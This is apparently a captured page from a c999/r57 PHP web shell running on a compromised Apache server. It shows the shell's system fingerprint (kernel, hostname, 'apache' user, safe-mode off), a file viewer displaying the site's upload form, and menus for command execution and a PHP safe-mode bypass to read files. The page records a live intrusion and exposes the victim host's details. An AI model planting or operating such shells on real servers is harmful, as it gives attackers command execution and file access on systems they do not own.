Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/editor/ drwxr-xr-x |
Viewing file: Select action/file-type: <html> <head> <title>Upload and Insert Local File</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-874"> <script language="javascript"> UPLOADSCRIPT = "upload.php"; // absolute POOLDIR = "/uploads"; // always relative to upload.pl POOLURL = "/uploads"; // always absolute FILESIZE = "1048576"; // 1024k, -10M for content function goSubmit() { with(document.forms[0]) { action = UPLOADSCRIPT pooldir.value = POOLDIR poolurl.value = POOLURL filesize.value = FILESIZE submit() } } </script> </head> <body> <center> <form method="post" enctype="multipart/form-data"> <TABLE width="550" border="1" cellpadding="2" cellspacing="3" bgcolor="#F5F6F8" style="font-family:Tahoma; font-size:12px;" cellpading="0"> <TR bgcolor="#CCCCCC"> <TD colspan="2" valign="top" bgcolor="#E8E7F7" align="center" style="padding:5px 0px 5px 0px">»ÃÐàÀ·ä¿Åì à»ç¹ (.doc, .xls) , ä¿Åì«Ô» (.zip, .tar) ä¿ÅìÃÙ»ÀÒ¾ .jpg áÅÐ .gif à·èÒ¹Ñé¹ ËÃ×Í ä¿Åì Flash (.swf) ª×èÍä¿Åì µéͧà»ç¹ÀÒÉÒÍѧ¡ÄÉ, ËéÒÁà¤ÒÐ ËÃ×Í àÇé¹ÇÃä , ãªéÍÑ¡ÉÃÃÐËÇèÒ§ a-z</TD> </TR> <TR> <TD width="158" align="right">àÅ×Í¡ä¿Åì :</TD> <TD width="333" align="left" valign="top"><input name="file" type="file" size="35" accept="application/x-www-form-urlencoded" /></TD> </TR> <TR> <TD align="center"> </TD> <TD align="left"> <input onClick="goSubmit()" title="Upload" type="button" value="ÍѾâËÅ´" style="width:60px" /> <input onClick="self.close()" title="Close" type="button" value="»Ô´" style="width:60px" /> </TD> </TR> </TABLE> <input type="hidden" name="pooldir" value=""> <input type="hidden" name="poolurl" value=""> <input type="hidden" name="filesize" value=""> </form> </center> </body> </html> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0043 ]-- |